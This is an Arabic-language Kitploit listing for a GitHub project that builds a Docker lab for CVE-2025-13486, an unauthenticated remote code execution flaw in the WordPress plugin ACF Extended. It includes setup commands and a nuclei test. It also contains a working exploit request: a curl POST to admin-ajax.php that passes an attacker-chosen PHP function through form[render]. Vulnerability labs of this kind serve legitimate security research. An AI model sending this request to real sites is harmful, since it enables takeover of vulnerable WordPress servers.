Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2025-13486-vuln-setup — بيئة اختبار Docker لـ CVE-2025-13486 (ACF Extended RCE). لأغراض البحث الأمني فقط. | Kitploit
أدوات/GitHubGitHub/kre80r/cve-2025-13486-vuln-setup
أمن الحاوياتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليممختبرات وتدريب عملي
GitHubkre80r/cve-2025-13486-vuln-setup

cve-2025-13486-vuln-setup

بيئة اختبار Docker لـ CVE-2025-13486 (ACF Extended RCE). لأغراض البحث الأمني فقط.

عرض المستودع
14منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-13486 بيئة اختبار قابلة للاستغلال

إعداد Docker لمرة واحدة لاختبار ثغرة RCE في ACF Extended.

بدء سريع

root@kitploit:~
# 1. Download plugins (run once)
./download-plugins.sh

# 2. Start environment
docker-compose up -d --build

# 3. Wait ~30 seconds for setup, then test
nuclei -t CVE-2025-13486.yaml -u http://localhost:8888

إعداد الإضافات يدويًا

إذا فشل سكربت التنزيل، ضع هذه الملفات يدويًا في مجلد plugins/:

  1. ACF Pro (تبعية مطلوبة)

    • تحميل من: https://www.advancedcustomfields.com/pro/
    • احفظ باسم: plugins/acf-pro.zip
  2. ACF Extended 0.9.0.5 (الإصدار القابل للاستغلال)

    • تحميل من: https://downloads.wordpress.org/plugin/acf-extended.0.9.0.5.zip
    • احفظ باسم: plugins/acf-extended.zip

اختبار الاستغلال

root@kitploit:~
# Extract nonce from homepage
curl -s http://localhost:8888/ | grep -oP '"nonce":"([a-f0-9]+)"'

# Test RCE with print_r
curl -X POST http://localhost:8888/wp-admin/admin-ajax.php \
  -d "action=acfe/form/render_form_ajax&nonce=<NONCE>&form[render]=print_r&form[test]=PWNED"

التنظيف

root@kitploit:~
docker-compose down -v

تفاصيل الثغرة

  • CVE: CVE-2025-13486
  • الإصدارات المتأثرة: ACF Extended 0.9.0.5 - 0.9.1.1
  • النوع: تنفيذ كود عن بُعد (RCE) بدون مصادقة عبر call_user_func_array()
  • CVSS: 9.8 (حرجة)
تنزيل الأداة